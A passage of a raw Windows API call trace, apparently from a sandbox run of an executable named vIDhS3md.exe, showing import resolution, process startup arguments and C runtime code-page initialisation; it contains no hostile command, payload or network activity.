(hModule=0x75130000, lpProcName="CreateProcessW") returned 0x7514a510 [0291.241] GetProcAddress (hModule=0x75130000, lpProcName="ExpandEnvironmentStringsW") returned 0x7514c8c0 [0291.241] GetProcAddress (hModule=0x75130000, lpProcName="GetDriveTypeW") returned 0x75156300 [0291.241] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemDirectoryW") returned 0x75149a90 [0291.241] GetProcAddress (hModule=0x75130000, lpProcName="DeleteFileW") returned 0x751561b0 [0291.242] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadErrorMode") returned 0x7514fae0 [0291.242] GetProcAddress (hModule=0x75130000, lpProcName="HeapSize") returned 0x779e4f40 [0291.242] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringW") returned 0x75149a40 [0291.242] GetProcAddress (hModule=0x75130000, lpProcName="GetStringTypeW") returned 0x751479b0 [0291.242] GetProcAddress (hModule=0x75130000, lpProcName="TerminateThread") returned 0x7514fcb0 [0291.242] GetProcAddress (hModule=0x75130000, lpProcName="OpenProcess") returned 0x751492b0 [0291.242] GetProcAddress (hModule=0x75130000, lpProcName="GetVersion") returned 0x7514a300 [0291.242] GetProcAddress (hModule=0x75130000, lpProcName="CreateFileW") returned 0x75156180 [0291.242] GetProcAddress (hModule=0x75130000, lpProcName="FindResourceW") returned 0x75153a50 [0291.242] GetProcAddress (hModule=0x75130000, lpProcName="SizeofResource") returned 0x75148cb0 [0291.242] GetProcAddress (hModule=0x75130000, lpProcName="CloseHandle") returned 0x75155f20 [0291.242] GetProcAddress (hModule=0x75130000, lpProcName="SetLastError") returned 0x75142af0 [0291.242] GetProcAddress (hModule=0x75130000, lpProcName="LoadResource") returned 0x751478f0 [0291.242] GetProcAddress (hModule=0x75130000, lpProcName="GetLastError") returned 0x75142db0 [0291.242] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcess") returned 0x75142da0 [0291.243] GetProcAddress (hModule=0x75130000, lpProcName="LockResource") returned 0x75147a50 [0291.243] GetProcAddress (hModule=0x75130000, lpProcName="GetCommandLineW") returned 0x7514a4b0 [0291.243] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleW") returned 0x75149660 [0291.243] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryW") returned 0x7514a0b0 [0291.243] GetProcAddress (hModule=0x75130000, lpProcName="GetStdHandle") returned 0x7514a060 [0291.243] GetProcAddress (hModule=0x75130000, lpProcName="LocalFree") returned 0x751487c0 [0291.243] GetProcAddress (hModule=0x75130000, lpProcName="LocalAlloc") returned 0x75148840 [0291.243] GetProcAddress (hModule=0x75130000, lpProcName="GetProcAddress") returned 0x75147940 [0291.243] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleFileNameW") returned 0x75149560 [0291.243] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleScreenBufferInfo") returned 0x751569c0 [0291.243] GetProcAddress (hModule=0x75130000, lpProcName="GetFileType") returned 0x75156390 [0291.243] GetProcAddress (hModule=0x75130000, lpProcName="OutputDebugStringW") returned 0x75171c30 [0291.243] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleW") returned 0x751568e0 [0291.243] GetProcAddress (hModule=0x75130000, lpProcName="WriteConsoleW") returned 0x75156920 [0291.243] GetProcAddress (hModule=0x75130000, lpProcName="SetFilePointerEx") returned 0x75156540 [0291.244] GetProcAddress (hModule=0x75130000, lpProcName="EnterCriticalSection") returned 0x779d5e80 [0291.244] GetProcAddress (hModule=0x75130000, lpProcName="LeaveCriticalSection") returned 0x779d5e00 [0291.250] GetProcAddress (hModule=0x75130000, lpProcName="SetStdHandle") returned 0x751726a0 [0291.251] GetProcAddress (hModule=0x75130000, lpProcName="HeapAlloc") returned 0x779cda90 [0291.251] GetProcAddress (hModule=0x75130000, lpProcName="EncodePointer") returned 0x779ef190 [0291.251] GetProcAddress (hModule=0x75130000, lpProcName="DecodePointer") returned 0x779ea200 [0291.251] GetProcAddress (hModule=0x75130000, lpProcName="ExitProcess") returned 0x751574f0 [0291.251] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleExW") returned 0x75149fa0 [0291.251] GetProcAddress (hModule=0x75130000, lpProcName="MultiByteToWideChar") returned 0x75142d60 [0291.251] GetProcAddress (hModule=0x75130000, lpProcName="WideCharToMultiByte") returned 0x751475a0 [0291.251] GetProcAddress (hModule=0x75130000, lpProcName="HeapFree") returned 0x751425e0 [0291.251] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleMode") returned 0x75156870 [0291.251] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleInputA") returned 0x751568c0 [0291.251] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleMode") returned 0x75156900 [0291.251] GetProcAddress (hModule=0x75130000, lpProcName="CreateThread") returned 0x75149700 [0291.251] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentThreadId") returned 0x75141b90 [0291.251] GetProcAddress (hModule=0x75130000, lpProcName="ExitThread") returned 0x779f2570 [0291.251] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryExW") returned 0x75147920 [0291.252] GetProcAddress (hModule=0x75130000, lpProcName="DeleteCriticalSection") returned 0x779e9920 [0291.252] GetProcAddress (hModule=0x75130000, lpProcName="FlushFileBuffers") returned 0x751562a0 [0291.252] GetProcAddress (hModule=0x75130000, lpProcName="WriteFile") returned 0x75156590 [0291.252] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleCP") returned 0x75156860 [0291.252] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0291.252] GetProcAddress (hModule=0x75130000, lpProcName="IsProcessorFeaturePresent") returned 0x75149680 [0291.252] GetProcAddress (hModule=0x75130000, lpProcName="ReadFile") returned 0x751564a0 [0291.252] GetProcAddress (hModule=0x75130000, lpProcName="GetStartupInfoW") returned 0x7514a080 [0291.252] GetProcAddress (hModule=0x75130000, lpProcName="UnhandledExceptionFilter") returned 0x751728e0 [0291.252] GetProcAddress (hModule=0x75130000, lpProcName="SetUnhandledExceptionFilter") returned 0x7514a2c0 [0291.252] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75156020 [0291.252] GetProcAddress (hModule=0x75130000, lpProcName="Sleep") returned 0x751477b0 [0291.253] GetProcAddress (hModule=0x75130000, lpProcName="TerminateProcess") returned 0x7514fbc0 [0291.253] GetProcAddress (hModule=0x75130000, lpProcName="TlsAlloc") returned 0x75149a70 [0291.253] GetProcAddress (hModule=0x75130000, lpProcName="TlsGetValue") returned 0x75141ba0 [0291.253] GetProcAddress (hModule=0x75130000, lpProcName="TlsSetValue") returned 0x75141da0 [0291.253] GetProcAddress (hModule=0x75130000, lpProcName="TlsFree") returned 0x75149930 [0291.253] GetProcAddress (hModule=0x75130000, lpProcName="IsValidCodePage") returned 0x7514a090 [0291.253] GetProcAddress (hModule=0x75130000, lpProcName="GetACP") returned 0x75148770 [0291.253] GetProcAddress (hModule=0x75130000, lpProcName="GetOEMCP") returned 0x7514fd10 [0291.253] GetProcAddress (hModule=0x75130000, lpProcName="GetCPInfo") returned 0x75149fc0 [0291.253] GetProcAddress (hModule=0x75130000, lpProcName="GetProcessHeap") returned 0x75147910 [0291.254] GetProcAddress (hModule=0x75130000, lpProcName="RtlUnwind") returned 0x75149a80 [0291.254] GetProcAddress (hModule=0x75130000, lpProcName="QueryPerformanceCounter") returned 0x75142dc0 [0291.254] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessId") returned 0x75141d90 [0291.254] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemTimeAsFileTime") returned 0x75142b90 [0291.254] GetProcAddress (hModule=0x75130000, lpProcName="GetEnvironmentStringsW") returned 0x7514a3b0 [0291.254] GetProcAddress (hModule=0x75130000, lpProcName="FreeEnvironmentStringsW") returned 0x7514a0f0 [0291.254] GetProcAddress (hModule=0x75130000, lpProcName="HeapReAlloc") returned 0x779cbae0 [0291.254] GetProcAddress (hModule=0x75130000, lpProcName="SetEndOfFile") returned 0x751564f0 [0291.254] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74c60000 [0291.254] GetProcAddress (hModule=0x74c60000, lpProcName="GetTokenInformation") returned 0x74c7ed40 [0291.254] GetProcAddress (hModule=0x74c60000, lpProcName="RegDeleteKeyW") returned 0x74c7fca0 [0291.254] GetProcAddress (hModule=0x74c60000, lpProcName="LookupPrivilegeValueW") returned 0x74c795e0 [0291.254] GetProcAddress (hModule=0x74c60000, lpProcName="AdjustTokenPrivileges") returned 0x74c80680 [0291.255] GetProcAddress (hModule=0x74c60000, lpProcName="OpenProcessToken") returned 0x74c7ee90 [0291.255] GetProcAddress (hModule=0x74c60000, lpProcName="RegSetValueExW") returned 0x74c7f0a0 [0291.255] GetProcAddress (hModule=0x74c60000, lpProcName="RegQueryValueExW") returned 0x74c7ed60 [0291.255] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyExW") returned 0x74c7ed80 [0291.255] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyW") returned 0x74c7f590 [0291.255] GetProcAddress (hModule=0x74c60000, lpProcName="RegCreateKeyW") returned 0x74c806c0 [0291.255] GetProcAddress (hModule=0x74c60000, lpProcName="RegCloseKey") returned 0x74c7efa0 [0291.255] GetProcAddress (hModule=0x74c60000, lpProcName="LookupAccountSidW") returned 0x74c7f7b0 [0291.255] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x74eb0000 [0291.255] GetProcAddress (hModule=0x74eb0000, lpProcName="PrintDlgW") returned 0x74ebc6a0 [0291.255] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x77370000 [0291.255] GetProcAddress (hModule=0x77370000, lpProcName="StartPage") returned 0x7741ee10 [0291.255] GetProcAddress (hModule=0x77370000, lpProcName="EndDoc") returned 0x773f55a0 [0291.255] GetProcAddress (hModule=0x77370000, lpProcName="StartDocW") returned 0x773f57e0 [0291.255] GetProcAddress (hModule=0x77370000, lpProcName="SetMapMode") returned 0x773f9590 [0291.256] GetProcAddress (hModule=0x77370000, lpProcName="GetDeviceCaps") returned 0x773f0820 [0291.256] GetProcAddress (hModule=0x77370000, lpProcName="EndPage") returned 0x7741fbc0 [0291.256] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74ad0000 [0291.256] GetProcAddress (hModule=0x74ad0000, lpProcName="SendMessageW") returned 0x74ae38f0 [0291.256] GetProcAddress (hModule=0x74ad0000, lpProcName="DialogBoxIndirectParamW") returned 0x74afb6b0 [0291.256] GetProcAddress (hModule=0x74ad0000, lpProcName="EndDialog") returned 0x74afb430 [0291.256] GetProcAddress (hModule=0x74ad0000, lpProcName="LoadCursorW") returned 0x74ae7740 [0291.256] GetProcAddress (hModule=0x74ad0000, lpProcName="InflateRect") returned 0x74af74e0 [0291.256] GetProcAddress (hModule=0x74ad0000, lpProcName="GetSysColorBrush") returned 0x74afefa0 [0291.256] GetProcAddress (hModule=0x74ad0000, lpProcName="SetCursor") returned 0x74b04ed0 [0291.256] GetProcAddress (hModule=0x74ad0000, lpProcName="SetWindowTextW") returned 0x74af4580 [0291.256] GetProcAddress (hModule=0x74ad0000, lpProcName="GetDlgItem") returned 0x74af1540 [0291.256] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x745d0000 [0291.256] GetProcAddress (hModule=0x745d0000, lpProcName="GetFileVersionInfoW") returned 0x745d1580 [0291.257] GetProcAddress (hModule=0x745d0000, lpProcName="VerQueryValueW") returned 0x745d1500 [0291.257] GetProcAddress (hModule=0x745d0000, lpProcName="GetFileVersionInfoSizeW") returned 0x745d1560 [0291.257] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0291.257] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0291.257] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff70 | out: lpSystemTimeAsFileTime=0x19ff70*(dwLowDateTime=0x5b1667d4, dwHighDateTime=0x1d45ac6)) [0291.257] GetCurrentThreadId () returned 0xfec [0291.257] GetCurrentProcessId () returned 0x6b4 [0291.257] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff68 | out: lpPerformanceCount=0x19ff68*=33871971032) returned 1 [0291.257] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0291.257] GetProcAddress (hModule=0x75130000, lpProcName="FlsAlloc") returned 0x7514a330 [0291.257] GetProcAddress (hModule=0x75130000, lpProcName="FlsFree") returned 0x7514f400 [0291.257] GetProcAddress (hModule=0x75130000, lpProcName="FlsGetValue") returned 0x75147580 [0291.258] GetProcAddress (hModule=0x75130000, lpProcName="FlsSetValue") returned 0x75149910 [0291.258] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionEx") returned 0x75156030 [0291.258] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventExW") returned 0x75155f90 [0291.258] GetProcAddress (hModule=0x75130000, lpProcName="CreateSemaphoreExW") returned 0x75155ff0 [0291.258] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadStackGuarantee") returned 0x7514a5d0 [0291.258] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolTimer") returned 0x7514a690 [0291.258] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolTimer") returned 0x779c40f0 [0291.258] GetProcAddress (hModule=0x75130000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bd630 [0291.258] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolTimer") returned 0x779becf0 [0291.259] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolWait") returned 0x75155720 [0291.259] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolWait") returned 0x779be140 [0291.259] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolWait") returned 0x779beb60 [0291.259] GetProcAddress (hModule=0x75130000, lpProcName="FlushProcessWriteBuffers") returned 0x779f9990 [0291.259] GetProcAddress (hModule=0x75130000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779f5540 [0291.259] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessorNumber") returned 0x779e9dc0 [0291.259] GetProcAddress (hModule=0x75130000, lpProcName="GetLogicalProcessorInformation") returned 0x7514a550 [0291.259] GetProcAddress (hModule=0x75130000, lpProcName="CreateSymbolicLinkW") returned 0x75170a40 [0291.259] GetProcAddress (hModule=0x75130000, lpProcName="SetDefaultDllDirectories") returned 0x74e60790 [0291.259] GetProcAddress (hModule=0x75130000, lpProcName="EnumSystemLocalesEx") returned 0x7514f8a0 [0291.259] GetProcAddress (hModule=0x75130000, lpProcName="CompareStringEx") returned 0x7514fa30 [0291.259] GetProcAddress (hModule=0x75130000, lpProcName="GetDateFormatEx") returned 0x75171030 [0291.259] GetProcAddress (hModule=0x75130000, lpProcName="GetLocaleInfoEx") returned 0x7514a000 [0291.259] GetProcAddress (hModule=0x75130000, lpProcName="GetTimeFormatEx") returned 0x751714b0 [0291.260] GetProcAddress (hModule=0x75130000, lpProcName="GetUserDefaultLocaleName") returned 0x7514a4f0 [0291.260] GetProcAddress (hModule=0x75130000, lpProcName="IsValidLocaleName") returned 0x751716f0 [0291.260] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringEx") returned 0x75149970 [0291.260] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentPackageId") returned 0x74de3c90 [0291.260] GetProcAddress (hModule=0x75130000, lpProcName="GetTickCount64") returned 0x75148710 [0291.260] GetProcAddress (hModule=0x75130000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0291.260] GetProcAddress (hModule=0x75130000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0291.261] GetCurrentThreadId () returned 0xfec [0291.261] GetStartupInfoW (in: lpStartupInfo=0x19fed0 | out: lpStartupInfo=0x19fed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula \"Workflow.Targets\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0xb82f76d9, hStdError=0x475810)) [0291.261] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0291.261] GetFileType (hFile=0x38) returned 0x2 [0291.261] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc0 [0291.261] GetFileType (hFile=0xc0) returned 0x3 [0291.261] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0291.261] GetFileType (hFile=0x40) returned 0x2 [0291.261] GetCommandLineW () returned="vIDhS3md.exe -accepteula \"Workflow.Targets\" -nobanner" [0291.261] GetEnvironmentStringsW () returned 0x4b1dc8* [0291.261] FreeEnvironmentStringsW (penv=0x4b1dc8) returned 1 [0291.261] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0291.262] GetLastError () returned 0x0 [0291.262] SetLastError (dwErrCode=0x0) [0291.262] GetLastError () returned 0x0 [0291.262] SetLastError (dwErrCode=0x0) [0291.263] GetLastError () returned 0x0 [0291.263] SetLastError (dwErrCode=0x0) [0291.263] GetACP () returned 0x4e4 [0291.263] GetLastError () returned 0x0 [0291.263] SetLastError (dwErrCode=0x0) [0291.263] IsValidCodePage (CodePage=0x4e4) returned 1 [0291.263] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec4 | out: lpCPInfo=0x19fec4) returned 1 [0291.263] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f98c | out: lpCPInfo=0x19f98c) returned 1 [0291.263] GetLastError () returned 0x0 [0291.263] SetLastError (dwErrCode=0x0) [0291.263] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0291.263] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0291.263] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0291.263] GetLastError () returned 0x0 [0291.263] SetLastError (dwErrCode=0x0) [0291.263] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0291.263] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0291.263] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0291.263] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x19f4c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0291.263] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x49\x77\x2f\xb8\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0291.263] GetLastError () returned 0x0 [0291.263] SetLastError (dwErrCode=0x0) [0291.263] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0291.263] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6f8, cchWideChar=256 | out: lpWideCharStr=" 